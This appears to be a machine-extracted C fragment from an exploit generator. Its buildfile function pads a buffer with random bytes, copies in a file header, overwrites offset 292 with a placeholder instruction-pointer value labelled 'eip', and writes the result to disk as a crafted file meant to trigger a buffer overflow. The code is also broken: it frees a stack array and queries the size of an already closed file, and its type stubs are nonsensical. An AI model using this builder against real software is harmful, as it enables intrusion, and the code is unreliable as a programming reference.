
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 int exit (int ) ;
 int fclose (int *) ;
 char* file ;
 int * fopen (char*,char*) ;
 int free (char*) ;
 int fwrite (char*,int,int,int *) ;
 int gen_random (char*,int) ;
 int getFsize (int *,char*) ;
 int memcpy (char*,char*,int) ;
 int print (char*) ;
 int printf (char*,int) ;
 int strlen (char*) ;

void buildfile(char* fname){
    char buffer[100000];
    char eip[]="\x55\x55\x55\x55";
       gen_random(buffer,5000);
       memcpy(buffer,file,strlen(file));
       memcpy(buffer+292,eip,4);
       FILE* f=fopen(fname,"wb");
       if(f){
           fwrite(buffer,1,1534,f);
            fclose(f);
             }
          else {
             print("Error in writing file");
              exit(0);
               }
           free(buffer);
           free(file);
         int sz=getFsize(f,fname);
       printf("[!]File is %d bytes\n",sz);
       }
